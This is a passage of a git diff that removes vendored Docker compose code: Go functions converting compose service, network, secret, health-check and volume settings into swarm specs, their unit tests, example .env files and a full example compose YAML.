:= convertHealthcheck(service.HealthCheck) - if err != nil { - return swarm.ServiceSpec{}, err - } - - networks, err := convertServiceNetworks(service.Networks, networkConfigs, namespace, service.Name) - if err != nil { - return swarm.ServiceSpec{}, err - } - - var logDriver *swarm.Driver - if service.Logging != nil { - logDriver = &swarm.Driver{ - Name: service.Logging.Driver, - Options: service.Logging.Options, - } - } - - serviceSpec := swarm.ServiceSpec{ - Annotations: swarm.Annotations{ - Name: name, - Labels: AddStackLabel(namespace, service.Deploy.Labels), - }, - TaskTemplate: swarm.TaskSpec{ - ContainerSpec: swarm.ContainerSpec{ - Image: service.Image, - Command: service.Entrypoint, - Args: service.Command, - Hostname: service.Hostname, - Hosts: sortStrings(convertExtraHosts(service.ExtraHosts)), - Healthcheck: healthcheck, - Env: sortStrings(convertEnvironment(service.Environment)), - Labels: AddStackLabel(namespace, service.Labels), - Dir: service.WorkingDir, - User: service.User, - Mounts: mounts, - StopGracePeriod: service.StopGracePeriod, - TTY: service.Tty, - OpenStdin: service.StdinOpen, - Secrets: secrets, - }, - LogDriver: logDriver, - Resources: resources, - RestartPolicy: restartPolicy, - Placement: &swarm.Placement{ - Constraints: service.Deploy.Placement.Constraints, - }, - }, - EndpointSpec: endpoint, - Mode: mode, - Networks: networks, - UpdateConfig: convertUpdateConfig(service.Deploy.UpdateConfig), - } - - return serviceSpec, nil -} - -func sortStrings(strs []string) []string { - sort.Strings(strs) - return strs -} - -type byNetworkTarget []swarm.NetworkAttachmentConfig - -func (a byNetworkTarget) Len() int { return len(a) } -func (a byNetworkTarget) Swap(i, j int) { a[i], a[j] = a[j], a[i] } -func (a byNetworkTarget) Less(i, j int) bool { return a[i].Target < a[j].Target } - -func convertServiceNetworks( - networks map[string]*composetypes.ServiceNetworkConfig, - networkConfigs networkMap, - namespace Namespace, - name string, -) ([]swarm.NetworkAttachmentConfig, error) { - if len(networks) == 0 { - return []swarm.NetworkAttachmentConfig{ - { - Target: namespace.Scope("default"), - Aliases: []string{name}, - }, - }, nil - } - - nets := []swarm.NetworkAttachmentConfig{} - for networkName, network := range networks { - networkConfig, ok := networkConfigs[networkName] - if !ok { - return []swarm.NetworkAttachmentConfig{}, fmt.Errorf( - "service %q references network %q, which is not declared", name, networkName) - } - var aliases []string - if network != nil { - aliases = network.Aliases - } - target := namespace.Scope(networkName) - if networkConfig.External.External { - target = networkConfig.External.Name - } - nets = append(nets, swarm.NetworkAttachmentConfig{ - Target: target, - Aliases: append(aliases, name), - }) - } - - sort.Sort(byNetworkTarget(nets)) - - return nets, nil -} - -// TODO: fix secrets API so that SecretAPIClient is not required here -func convertServiceSecrets( - client client.SecretAPIClient, - namespace Namespace, - secrets []composetypes.ServiceSecretConfig, - secretSpecs map[string]composetypes.SecretConfig, -) ([]*swarm.SecretReference, error) { - opts := []*types.SecretRequestOption{} - for _, secret := range secrets { - target := secret.Target - if target == "" { - target = secret.Source - } - - source := namespace.Scope(secret.Source) - secretSpec := secretSpecs[secret.Source] - if secretSpec.External.External { - source = secretSpec.External.Name - } - - uid := secret.UID - gid := secret.GID - if uid == "" { - uid = "0" - } - if gid == "" { - gid = "0" - } - - opts = append(opts, &types.SecretRequestOption{ - Source: source, - Target: target, - UID: uid, - GID: gid, - Mode: os.FileMode(secret.Mode), - }) - } - - return servicecli.ParseSecrets(client, opts) -} - -func convertExtraHosts(extraHosts map[string]string) []string { - hosts := []string{} - for host, ip := range extraHosts { - hosts = append(hosts, fmt.Sprintf("%s %s", ip, host)) - } - return hosts -} - -func convertHealthcheck(healthcheck *composetypes.HealthCheckConfig) (*container.HealthConfig, error) { - if healthcheck == nil { - return nil, nil - } - var ( - err error - timeout, interval time.Duration - retries int - ) - if healthcheck.Disable { - if len(healthcheck.Test) != 0 { - return nil, fmt.Errorf("test and disable can't be set at the same time") - } - return &container.HealthConfig{ - Test: []string{"NONE"}, - }, nil - - } - if healthcheck.Timeout != "" { - timeout, err = time.ParseDuration(healthcheck.Timeout) - if err != nil { - return nil, err - } - } - if healthcheck.Interval != "" { - interval, err = time.ParseDuration(healthcheck.Interval) - if err != nil { - return nil, err - } - } - if healthcheck.Retries != nil { - retries = int(*healthcheck.Retries) - } - return &container.HealthConfig{ - Test: healthcheck.Test, - Timeout: timeout, - Interval: interval, - Retries: retries, - }, nil -} - -func convertRestartPolicy(restart string, source *composetypes.RestartPolicy) (*swarm.RestartPolicy, error) { - // TODO: log if restart is being ignored - if source == nil { - policy, err := runconfigopts.ParseRestartPolicy(restart) - if err != nil { - return nil, err - } - switch { - case policy.IsNone(): - return nil, nil - case policy.IsAlways(), policy.IsUnlessStopped(): - return &swarm.RestartPolicy{ - Condition: swarm.RestartPolicyConditionAny, - }, nil - case policy.IsOnFailure(): - attempts := uint64(policy.MaximumRetryCount) - return &swarm.RestartPolicy{ - Condition: swarm.RestartPolicyConditionOnFailure, - MaxAttempts: &attempts, - }, nil - default: - return nil, fmt.Errorf("unknown restart policy: %s", restart) - } - } - return &swarm.RestartPolicy{ - Condition: swarm.RestartPolicyCondition(source.Condition), - Delay: source.Delay, - MaxAttempts: source.MaxAttempts, - Window: source.Window, - }, nil -} - -func convertUpdateConfig(source *composetypes.UpdateConfig) *swarm.UpdateConfig { - if source == nil { - return nil - } - parallel := uint64(1) - if source.Parallelism != nil { - parallel = *source.Parallelism - } - return &swarm.UpdateConfig{ - Parallelism: parallel, - Delay: source.Delay, - FailureAction: source.FailureAction, - Monitor: source.Monitor, - MaxFailureRatio: source.MaxFailureRatio, - } -} - -func convertResources(source composetypes.Resources) (*swarm.ResourceRequirements, error) { - resources := &swarm.ResourceRequirements{} - var err error - if source.Limits != nil { - var cpus int64 - if source.Limits.NanoCPUs != "" { - cpus, err = opts.ParseCPUs(source.Limits.NanoCPUs) - if err != nil { - return nil, err - } - } - resources.Limits = &swarm.Resources{ - NanoCPUs: cpus, - MemoryBytes: int64(source.Limits.MemoryBytes), - } - } - if source.Reservations != nil { - var cpus int64 - if source.Reservations.NanoCPUs != "" { - cpus, err = opts.ParseCPUs(source.Reservations.NanoCPUs) - if err != nil { - return nil, err - } - } - resources.Reservations = &swarm.Resources{ - NanoCPUs: cpus, - MemoryBytes: int64(source.Reservations.MemoryBytes), - } - } - return resources, nil - -} - -type byPublishedPort []swarm.PortConfig - -func (a byPublishedPort) Len() int { return len(a) } -func (a byPublishedPort) Swap(i, j int) { a[i], a[j] = a[j], a[i] } -func (a byPublishedPort) Less(i, j int) bool { return a[i].PublishedPort < a[j].PublishedPort } - -func convertEndpointSpec(source []string) (*swarm.EndpointSpec, error) { - portConfigs := []swarm.PortConfig{} - ports, portBindings, err := nat.ParsePortSpecs(source) - if err != nil { - return nil, err - } - - for port := range ports { - portConfigs = append( - portConfigs, - opts.ConvertPortToPortConfig(port, portBindings)...) - } - - // Sorting to make sure these are always in the same order - sort.Sort(byPublishedPort(portConfigs)) - - return &swarm.EndpointSpec{Ports: portConfigs}, nil -} - -func convertEnvironment(source map[string]string) []string { - var output []string - - for name, value := range source { - output = append(output, fmt.Sprintf("%s=%s", name, value)) - } - - return output -} - -func convertDeployMode(mode string, replicas *uint64) (swarm.ServiceMode, error) { - serviceMode := swarm.ServiceMode{} - - switch mode { - case "global": - if replicas != nil { - return serviceMode, fmt.Errorf("replicas can only be used with replicated mode") - } - serviceMode.Global = &swarm.GlobalService{} - case "replicated", "": - serviceMode.Replicated = &swarm.ReplicatedService{Replicas: replicas} - default: - return serviceMode, fmt.Errorf("Unknown mode: %s", mode) - } - return serviceMode, nil -} diff --git a/vendor/github.com/docker/docker/cli/compose/convert/service_test.go b/vendor/github.com/docker/docker/cli/compose/convert/service_test.go deleted file mode 100644 index 2e614d730c..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/convert/service_test.go +++ /dev/null @@ -1,216 +0,0 @@ -package convert - -import ( - "sort" - "strings" - "testing" - "time" - - "github.com/docker/docker/api/types/container" - "github.com/docker/docker/api/types/swarm" - composetypes "github.com/docker/docker/cli/compose/types" - "github.com/docker/docker/pkg/testutil/assert" -) - -func TestConvertRestartPolicyFromNone(t *testing.T) { - policy, err := convertRestartPolicy("no", nil) - assert.NilError(t, err) - assert.Equal(t, policy, (*swarm.RestartPolicy)(nil)) -} - -func TestConvertRestartPolicyFromUnknown(t *testing.T) { - _, err := convertRestartPolicy("unknown", nil) - assert.Error(t, err, "unknown restart policy: unknown") -} - -func TestConvertRestartPolicyFromAlways(t *testing.T) { - policy, err := convertRestartPolicy("always", nil) - expected := &swarm.RestartPolicy{ - Condition: swarm.RestartPolicyConditionAny, - } - assert.NilError(t, err) - assert.DeepEqual(t, policy, expected) -} - -func TestConvertRestartPolicyFromFailure(t *testing.T) { - policy, err := convertRestartPolicy("on-failure:4", nil) - attempts := uint64(4) - expected := &swarm.RestartPolicy{ - Condition: swarm.RestartPolicyConditionOnFailure, - MaxAttempts: &attempts, - } - assert.NilError(t, err) - assert.DeepEqual(t, policy, expected) -} - -func TestConvertEnvironment(t *testing.T) { - source := map[string]string{ - "foo": "bar", - "key": "value", - } - env := convertEnvironment(source) - sort.Strings(env) - assert.DeepEqual(t, env, []string{"foo=bar", "key=value"}) -} - -func TestConvertResourcesFull(t *testing.T) { - source := composetypes.Resources{ - Limits: &composetypes.Resource{ - NanoCPUs: "0.003", - MemoryBytes: composetypes.UnitBytes(300000000), - }, - Reservations: &composetypes.Resource{ - NanoCPUs: "0.002", - MemoryBytes: composetypes.UnitBytes(200000000), - }, - } - resources, err := convertResources(source) - assert.NilError(t, err) - - expected := &swarm.ResourceRequirements{ - Limits: &swarm.Resources{ - NanoCPUs: 3000000, - MemoryBytes: 300000000, - }, - Reservations: &swarm.Resources{ - NanoCPUs: 2000000, - MemoryBytes: 200000000, - }, - } - assert.DeepEqual(t, resources, expected) -} - -func TestConvertResourcesOnlyMemory(t *testing.T) { - source := composetypes.Resources{ - Limits: &composetypes.Resource{ - MemoryBytes: composetypes.UnitBytes(300000000), - }, - Reservations: &composetypes.Resource{ - MemoryBytes: composetypes.UnitBytes(200000000), - }, - } - resources, err := convertResources(source) - assert.NilError(t, err) - - expected := &swarm.ResourceRequirements{ - Limits: &swarm.Resources{ - MemoryBytes: 300000000, - }, - Reservations: &swarm.Resources{ - MemoryBytes: 200000000, - }, - } - assert.DeepEqual(t, resources, expected) -} - -func TestConvertHealthcheck(t *testing.T) { - retries := uint64(10) - source := &composetypes.HealthCheckConfig{ - Test: []string{"EXEC", "touch", "/foo"}, - Timeout: "30s", - Interval: "2ms", - Retries: &retries, - } - expected := &container.HealthConfig{ - Test: source.Test, - Timeout: 30 * time.Second, - Interval: 2 * time.Millisecond, - Retries: 10, - } - - healthcheck, err := convertHealthcheck(source) - assert.NilError(t, err) - assert.DeepEqual(t, healthcheck, expected) -} - -func TestConvertHealthcheckDisable(t *testing.T) { - source := &composetypes.HealthCheckConfig{Disable: true} - expected := &container.HealthConfig{ - Test: []string{"NONE"}, - } - - healthcheck, err := convertHealthcheck(source) - assert.NilError(t, err) - assert.DeepEqual(t, healthcheck, expected) -} - -func TestConvertHealthcheckDisableWithTest(t *testing.T) { - source := &composetypes.HealthCheckConfig{ - Disable: true, - Test: []string{"EXEC", "touch"}, - } - _, err := convertHealthcheck(source) - assert.Error(t, err, "test and disable can't be set") -} - -func TestConvertServiceNetworksOnlyDefault(t *testing.T) { - networkConfigs := networkMap{} - networks := map[string]*composetypes.ServiceNetworkConfig{} - - configs, err := convertServiceNetworks( - networks, networkConfigs, NewNamespace("foo"), "service") - - expected := []swarm.NetworkAttachmentConfig{ - { - Target: "foo_default", - Aliases: []string{"service"}, - }, - } - - assert.NilError(t, err) - assert.DeepEqual(t, configs, expected) -} - -func TestConvertServiceNetworks(t *testing.T) { - networkConfigs := networkMap{ - "front": composetypes.NetworkConfig{ - External: composetypes.External{ - External: true, - Name: "fronttier", - }, - }, - "back": composetypes.NetworkConfig{}, - } - networks := map[string]*composetypes.ServiceNetworkConfig{ - "front": { - Aliases: []string{"something"}, - }, - "back": { - Aliases: []string{"other"}, - }, - } - - configs, err := convertServiceNetworks( - networks, networkConfigs, NewNamespace("foo"), "service") - - expected := []swarm.NetworkAttachmentConfig{ - { - Target: "foo_back", - Aliases: []string{"other", "service"}, - }, - { - Target: "fronttier", - Aliases: []string{"something", "service"}, - }, - } - - sortedConfigs := byTargetSort(configs) - sort.Sort(&sortedConfigs) - - assert.NilError(t, err) - assert.DeepEqual(t, []swarm.NetworkAttachmentConfig(sortedConfigs), expected) -} - -type byTargetSort []swarm.NetworkAttachmentConfig - -func (s byTargetSort) Len() int { - return len(s) -} - -func (s byTargetSort) Less(i, j int) bool { - return strings.Compare(s[i].Target, s[j].Target) < 0 -} - -func (s byTargetSort) Swap(i, j int) { - s[i], s[j] = s[j], s[i] -} diff --git a/vendor/github.com/docker/docker/cli/compose/convert/volume.go b/vendor/github.com/docker/docker/cli/compose/convert/volume.go deleted file mode 100644 index 24442d4dc7..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/convert/volume.go +++ /dev/null @@ -1,128 +0,0 @@ -package convert - -import ( - "fmt" - "strings" - - "github.com/docker/docker/api/types/mount" - composetypes "github.com/docker/docker/cli/compose/types" -) - -type volumes map[string]composetypes.VolumeConfig - -// Volumes from compose-file types to engine api types -func Volumes(serviceVolumes []string, stackVolumes volumes, namespace Namespace) ([]mount.Mount, error) { - var mounts []mount.Mount - - for _, volumeSpec := range serviceVolumes { - mount, err := convertVolumeToMount(volumeSpec, stackVolumes, namespace) - if err != nil { - return nil, err - } - mounts = append(mounts, mount) - } - return mounts, nil -} - -func convertVolumeToMount(volumeSpec string, stackVolumes volumes, namespace Namespace) (mount.Mount, error) { - var source, target string - var mode []string - - // TODO: split Windows path mappings properly - parts := strings.SplitN(volumeSpec, ":", 3) - - for _, part := range parts { - if strings.TrimSpace(part) == "" { - return mount.Mount{}, fmt.Errorf("invalid volume: %s", volumeSpec) - } - } - - switch len(parts) { - case 3: - source = parts[0] - target = parts[1] - mode = strings.Split(parts[2], ",") - case 2: - source = parts[0] - target = parts[1] - case 1: - target = parts[0] - } - - if source == "" { - // Anonymous volume - return mount.Mount{ - Type: mount.TypeVolume, - Target: target, - }, nil - } - - // TODO: catch Windows paths here - if strings.HasPrefix(source, "/") { - return mount.Mount{ - Type: mount.TypeBind, - Source: source, - Target: target, - ReadOnly: isReadOnly(mode), - BindOptions: getBindOptions(mode), - }, nil - } - - stackVolume, exists := stackVolumes[source] - if !exists { - return mount.Mount{}, fmt.Errorf("undefined volume: %s", source) - } - - var volumeOptions *mount.VolumeOptions - if stackVolume.External.Name != "" { - source = stackVolume.External.Name - } else { - volumeOptions = &mount.VolumeOptions{ - Labels: AddStackLabel(namespace, stackVolume.Labels), - NoCopy: isNoCopy(mode), - } - - if stackVolume.Driver != "" { - volumeOptions.DriverConfig = &mount.Driver{ - Name: stackVolume.Driver, - Options: stackVolume.DriverOpts, - } - } - source = namespace.Scope(source) - } - return mount.Mount{ - Type: mount.TypeVolume, - Source: source, - Target: target, - ReadOnly: isReadOnly(mode), - VolumeOptions: volumeOptions, - }, nil -} - -func modeHas(mode []string, field string) bool { - for _, item := range mode { - if item == field { - return true - } - } - return false -} - -func isReadOnly(mode []string) bool { - return modeHas(mode, "ro") -} - -func isNoCopy(mode []string) bool { - return modeHas(mode, "nocopy") -} - -func getBindOptions(mode []string) *mount.BindOptions { - for _, item := range mode { - for _, propagation := range mount.Propagations { - if mount.Propagation(item) == propagation { - return &mount.BindOptions{Propagation: mount.Propagation(item)} - } - } - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/compose/convert/volume_test.go b/vendor/github.com/docker/docker/cli/compose/convert/volume_test.go deleted file mode 100644 index 113ab1e1b6..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/convert/volume_test.go +++ /dev/null @@ -1,133 +0,0 @@ -package convert - -import ( - "testing" - - "github.com/docker/docker/api/types/mount" - composetypes "github.com/docker/docker/cli/compose/types" - "github.com/docker/docker/pkg/testutil/assert" -) - -func TestIsReadOnly(t *testing.T) { - assert.Equal(t, isReadOnly([]string{"foo", "bar", "ro"}), true) - assert.Equal(t, isReadOnly([]string{"ro"}), true) - assert.Equal(t, isReadOnly([]string{}), false) - assert.Equal(t, isReadOnly([]string{"foo", "rw"}), false) - assert.Equal(t, isReadOnly([]string{"foo"}), false) -} - -func TestIsNoCopy(t *testing.T) { - assert.Equal(t, isNoCopy([]string{"foo", "bar", "nocopy"}), true) - assert.Equal(t, isNoCopy([]string{"nocopy"}), true) - assert.Equal(t, isNoCopy([]string{}), false) - assert.Equal(t, isNoCopy([]string{"foo", "rw"}), false) -} - -func TestGetBindOptions(t *testing.T) { - opts := getBindOptions([]string{"slave"}) - expected := mount.BindOptions{Propagation: mount.PropagationSlave} - assert.Equal(t, *opts, expected) -} - -func TestGetBindOptionsNone(t *testing.T) { - opts := getBindOptions([]string{"ro"}) - assert.Equal(t, opts, (*mount.BindOptions)(nil)) -} - -func TestConvertVolumeToMountNamedVolume(t *testing.T) { - stackVolumes := volumes{ - "normal": composetypes.VolumeConfig{ - Driver: "glusterfs", - DriverOpts: map[string]string{ - "opt": "value", - }, - Labels: map[string]string{ - "something": "labeled", - }, - }, - } - namespace := NewNamespace("foo") - expected := mount.Mount{ - Type: mount.TypeVolume, - Source: "foo_normal", - Target: "/foo", - ReadOnly: true, - VolumeOptions: &mount.VolumeOptions{ - Labels: map[string]string{ - LabelNamespace: "foo", - "something": "labeled", - }, - DriverConfig: &mount.Driver{ - Name: "glusterfs", - Options: map[string]string{ - "opt": "value", - }, - }, - }, - } - mount, err := convertVolumeToMount("normal:/foo:ro", stackVolumes, namespace) - assert.NilError(t, err) - assert.DeepEqual(t, mount, expected) -} - -func TestConvertVolumeToMountNamedVolumeExternal(t *testing.T) { - stackVolumes := volumes{ - "outside": composetypes.VolumeConfig{ - External: composetypes.External{ - External: true, - Name: "special", - }, - }, - } - namespace := NewNamespace("foo") - expected := mount.Mount{ - Type: mount.TypeVolume, - Source: "special", - Target: "/foo", - } - mount, err := convertVolumeToMount("outside:/foo", stackVolumes, namespace) - assert.NilError(t, err) - assert.DeepEqual(t, mount, expected) -} - -func TestConvertVolumeToMountBind(t *testing.T) { - stackVolumes := volumes{} - namespace := NewNamespace("foo") - expected := mount.Mount{ - Type: mount.TypeBind, - Source: "/bar", - Target: "/foo", - ReadOnly: true, - BindOptions: &mount.BindOptions{Propagation: mount.PropagationShared}, - } - mount, err := convertVolumeToMount("/bar:/foo:ro,shared", stackVolumes, namespace) - assert.NilError(t, err) - assert.DeepEqual(t, mount, expected) -} - -func TestConvertVolumeToMountVolumeDoesNotExist(t *testing.T) { - namespace := NewNamespace("foo") - _, err := convertVolumeToMount("unknown:/foo:ro", volumes{}, namespace) - assert.Error(t, err, "undefined volume: unknown") -} - -func TestConvertVolumeToMountAnonymousVolume(t *testing.T) { - stackVolumes := map[string]composetypes.VolumeConfig{} - namespace := NewNamespace("foo") - expected := mount.Mount{ - Type: mount.TypeVolume, - Target: "/foo/bar", - } - mnt, err := convertVolumeToMount("/foo/bar", stackVolumes, namespace) - assert.NilError(t, err) - assert.DeepEqual(t, mnt, expected) -} - -func TestConvertVolumeToMountInvalidFormat(t *testing.T) { - namespace := NewNamespace("foo") - invalids := []string{"::", "::cc", ":bb:", "aa::", "aa::cc", "aa:bb:", " : : ", " : :cc", " :bb: ", "aa: : ", "aa: :cc", "aa:bb: "} - for _, vol := range invalids { - _, err := convertVolumeToMount(vol, map[string]composetypes.VolumeConfig{}, namespace) - assert.Error(t, err, "invalid volume: "+vol) - } -} diff --git a/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation.go b/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation.go deleted file mode 100644 index 734f28ec9d..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation.go +++ /dev/null @@ -1,90 +0,0 @@ -package interpolation - -import ( - "fmt" - - "github.com/docker/docker/cli/compose/template" - "github.com/docker/docker/cli/compose/types" -) - -// Interpolate replaces variables in a string with the values from a mapping -func Interpolate(config types.Dict, section string, mapping template.Mapping) (types.Dict, error) { - out := types.Dict{} - - for name, item := range config { - if item == nil { - out[name] = nil - continue - } - interpolatedItem, err := interpolateSectionItem(name, item.(types.Dict), section, mapping) - if err != nil { - return nil, err - } - out[name] = interpolatedItem - } - - return out, nil -} - -func interpolateSectionItem( - name string, - item types.Dict, - section string, - mapping template.Mapping, -) (types.Dict, error) { - - out := types.Dict{} - - for key, value := range item { - interpolatedValue, err := recursiveInterpolate(value, mapping) - if err != nil { - return nil, fmt.Errorf( - "Invalid interpolation format for %#v option in %s %#v: %#v", - key, section, name, err.Template, - ) - } - out[key] = interpolatedValue - } - - return out, nil - -} - -func recursiveInterpolate( - value interface{}, - mapping template.Mapping, -) (interface{}, *template.InvalidTemplateError) { - - switch value := value.(type) { - - case string: - return template.Substitute(value, mapping) - - case types.Dict: - out := types.Dict{} - for key, elem := range value { - interpolatedElem, err := recursiveInterpolate(elem, mapping) - if err != nil { - return nil, err - } - out[key] = interpolatedElem - } - return out, nil - - case []interface{}: - out := make([]interface{}, len(value)) - for i, elem := range value { - interpolatedElem, err := recursiveInterpolate(elem, mapping) - if err != nil { - return nil, err - } - out[i] = interpolatedElem - } - return out, nil - - default: - return value, nil - - } - -} diff --git a/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation_test.go b/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation_test.go deleted file mode 100644 index c3921701b3..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation_test.go +++ /dev/null @@ -1,59 +0,0 @@ -package interpolation - -import ( - "testing" - - "github.com/stretchr/testify/assert" - - "github.com/docker/docker/cli/compose/types" -) - -var defaults = map[string]string{ - "USER": "jenny", - "FOO": "bar", -} - -func defaultMapping(name string) (string, bool) { - val, ok := defaults[name] - return val, ok -} - -func TestInterpolate(t *testing.T) { - services := types.Dict{ - "servicea": types.Dict{ - "image": "example:${USER}", - "volumes": []interface{}{"$FOO:/target"}, - "logging": types.Dict{ - "driver": "${FOO}", - "options": types.Dict{ - "user": "$USER", - }, - }, - }, - } - expected := types.Dict{ - "servicea": types.Dict{ - "image": "example:jenny", - "volumes": []interface{}{"bar:/target"}, - "logging": types.Dict{ - "driver": "bar", - "options": types.Dict{ - "user": "jenny", - }, - }, - }, - } - result, err := Interpolate(services, "service", defaultMapping) - assert.NoError(t, err) - assert.Equal(t, expected, result) -} - -func TestInvalidInterpolation(t *testing.T) { - services := types.Dict{ - "servicea": types.Dict{ - "image": "${", - }, - } - _, err := Interpolate(services, "service", defaultMapping) - assert.EqualError(t, err, `Invalid interpolation format for "image" option in service "servicea": "${"`) -} diff --git a/vendor/github.com/docker/docker/cli/compose/loader/example1.env b/vendor/github.com/docker/docker/cli/compose/loader/example1.env deleted file mode 100644 index 3e7a059613..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/loader/example1.env +++ /dev/null @@ -1,8 +0,0 @@ -# passed through -FOO=1 - -# overridden in example2.env -BAR=1 - -# overridden in full-example.yml -BAZ=1 diff --git a/vendor/github.com/docker/docker/cli/compose/loader/example2.env b/vendor/github.com/docker/docker/cli/compose/loader/example2.env deleted file mode 100644 index 0920d5ab05..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/loader/example2.env +++ /dev/null @@ -1 +0,0 @@ -BAR=2 diff --git a/vendor/github.com/docker/docker/cli/compose/loader/full-example.yml b/vendor/github.com/docker/docker/cli/compose/loader/full-example.yml deleted file mode 100644 index fb5686a380..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/loader/full-example.yml +++ /dev/null @@ -1,287 +0,0 @@ -version: "3" - -services: - foo: - cap_add: - - ALL - - cap_drop: - - NET_ADMIN - - SYS_ADMIN - - cgroup_parent: m-executor-abcd - - # String or list - command: bundle exec thin -p 3000 - # command: ["bundle", "exec", "thin", "-p", "3000"] - - container_name: my-web-container - - depends_on: - - db - - redis - - deploy: - mode: replicated - replicas: 6 - labels: [FOO=BAR] - update_config: - parallelism: 3 - delay: 10s - failure_action: continue - monitor: 60s - max_failure_ratio: 0.3 - resources: - limits: - cpus: '0.001' - memory: 50M - reservations: - cpus: '0.0001' - memory: 20M - restart_policy: - condition: on_failure - delay: 5s - max_attempts: 3 - window: 120s - placement: - constraints: [node=foo] - - devices: - - "/dev/ttyUSB0:/dev/ttyUSB0" - - # String or list - # dns: 8.8.8.8 - dns: - - 8.8.8.8 - - 9.9.9.9 - - # String or list - # dns_search: example.com - dns_search: - - dc1.example.com - - dc2.example.com - - domainname: foo.com - - # String or list - # entrypoint: /code/entrypoint.sh -p 3000 - entrypoint: ["/code/entrypoint.sh", "-p", "3000"] - - # String or list - # env_file: .env - env_file: - - ./example1.env - - ./example2.env - - # Mapping or list - # Mapping values can be strings, numbers or null - # Booleans are not allowed - must be quoted - environment: - RACK_ENV: development - SHOW: 'true' - SESSION_SECRET: - BAZ: 3 - # environment: - # - RACK_ENV=development - # - SHOW=true - # - SESSION_SECRET - - # Items can be strings or numbers - expose: - - "3000" - - 8000 - - external_links: - - redis_1 - - project_db_1:mysql - - project_db_1:postgresql - - # Mapping or list - # Mapping values must be strings - # extra_hosts: - # somehost: "162.242.195.82" - # otherhost: "50.31.209.229" - extra_hosts: - - "somehost:162.242.195.82" - - "otherhost:50.31.209.229" - - hostname: foo - - healthcheck: - test: echo "hello world" - interval: 10s - timeout: 1s - retries: 5 - - # Any valid image reference - repo, tag, id, sha - image: redis - # image: ubuntu:14.04 - # image: tutum/influxdb - # image: example-registry.com:4000/postgresql - # image: a4bc65fd - # image: busybox@sha256:38a203e1986cf79639cfb9b2e1d6e773de84002feea2d4eb006b52004ee8502d - - ipc: host - - # Mapping or list - # Mapping values can be strings, numbers or null - labels: - com.example.description: "Accounting webapp" - com.example.number: 42 - com.example.empty-label: - # labels: - # - "com.example.description=Accounting webapp" - # - "com.example.number=42" - # - "com.example.empty-label" - - links: - - db - - db:database - - redis - - logging: - driver: syslog - options: - syslog-address: "tcp://192.168.0.42:123" - - mac_address: 02:42:ac:11:65:43 - - # network_mode: "bridge" - # network_mode: "host" - # network_mode: "none" - # Use the network mode of an arbitrary container from another service - # network_mode: "service:db" - # Use the network mode of another container, specified by name or id - # network_mode: "container:some-container" - network_mode: "container:0cfeab0f748b9a743dc3da582046357c6ef497631c1a016d28d2bf9b4f899f7b" - - networks: - some-network: - aliases: - - alias1 - - alias3 - other-network: - ipv4_address: 172.16.238.10 - ipv6_address: 2001:3984:3989::10 - other-other-network: - - pid: "host" - - ports: - - 3000 - - "3000-3005" - - "8000:8000" - - "9090-9091:8080-8081" - - "49100:22" - - "127.0.0.1:8001:8001" - - "127.0.0.1:5000-5010:5000-5010" - - privileged: true - - read_only: true - - restart: always - - security_opt: - - label=level:s0:c100,c200 - - label=type:svirt_apache_t - - stdin_open: true - - stop_grace_period: 20s - - stop_signal: SIGUSR1 - - # String or list - # tmpfs: /run - tmpfs: - - /run - - /tmp - - tty: true - - ulimits: - # Single number or mapping with soft + hard limits - nproc: 65535 - nofile: - soft: 20000 - hard: 40000 - - user: someone - - volumes: - # Just specify a path and let the Engine create a volume - - /var/lib/mysql - # Specify an absolute path mapping - - /opt/data:/var/lib/mysql - # Path on the host, relative to the Compose file - - .:/code - - ./static:/var/www/html - # User-relative path - - ~/configs:/etc/configs/:ro - # Named volume - - datavolume:/var/lib/mysql - - working_dir: /code - -networks: - # Entries can be null, which specifies simply that a network - # called "{project name}_some-network" should be created and - # use the default driver - some-network: - - other-network: - driver: overlay - - driver_opts: - # Values can be strings or numbers - foo: "bar" - baz: 1 - - ipam: - driver: overlay - # driver_opts: - # # Values can be strings or numbers - # com.docker.network.enable_ipv6: "true" - # com.docker.network.numeric_value: 1 - config: - - subnet: 172.16.238.0/24 - # gateway: 172.16.238.1 - - subnet: 2001:3984:3989::/64 - # gateway: 2001:3984:3989::1 - - external-network: - # Specifies that a pre-existing network called "external-network" - # can be referred to within this file as "external-network" - external: true - - other-external-network: - # Specifies that a pre-existing network called "my-cool-network" - # can be referred to within this file as "other-external-network" - external: - name: my-cool-network - -volumes: - # Entries can be null, which specifies simply that a volume - # called "{project name}_some-volume" should be created and - # use the default driver - some-volume: - - other-volume: - driver: flocker - - driver_opts: - # Values can be strings or numbers - foo: "bar" - baz: 1 - - external-volume: - # Specifies that a pre-existing volume called "external-volume" - # can be referred to within this file as "external-volume" - external: true - - other-external-volume: - # Specifies that a pre-existing volume called "my-cool-volume" - # can be referred to within this file as "other-external-volume" - external: - name: my-cool-volume diff --git a/vendor/github.com/docker/docker/cli/compose/loader/loader.go b/vendor/github.com/docker/docker/cli/compose/loader/loader.go deleted file mode 100644 index 39f69a03ff..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/loader/loader.go +++ /dev/null @@ -1,653 +0,0 @@ -package loader - -import ( - "fmt" - "os" - "path" - "reflect" - "regexp" - "sort" - "strings" - - "github.com/docker/docker/cli/compose/interpolation" - "github.com/docker/docker/cli/compose/schema" - "github.com/docker/docker/cli/compose/types" - "github.com/docker/docker/runconfig/opts" - units "github.com/docker/go-units" - shellwords "github.com/mattn/go-shellwords" - "github.com/mitchellh/mapstructure" - yaml "gopkg.in/yaml.v2" -) - -var ( - fieldNameRegexp = regexp.MustCompile("[A-Z][a-z0-9]+") -) - -// ParseYAML reads the bytes from a file, parses the bytes into a mapping -// structure, and returns it. -func ParseYAML(source []byte) (types.Dict, error) { - var cfg interface{} - if err := yaml.Unmarshal(source, &cfg); err != nil { - return nil, err - } - cfgMap, ok := cfg.(map[interface{}]interface{}) - if !ok { - return nil, fmt.Errorf("Top-level object must be a mapping") - } - converted, err := convertToStringKeysRecursive(cfgMap, 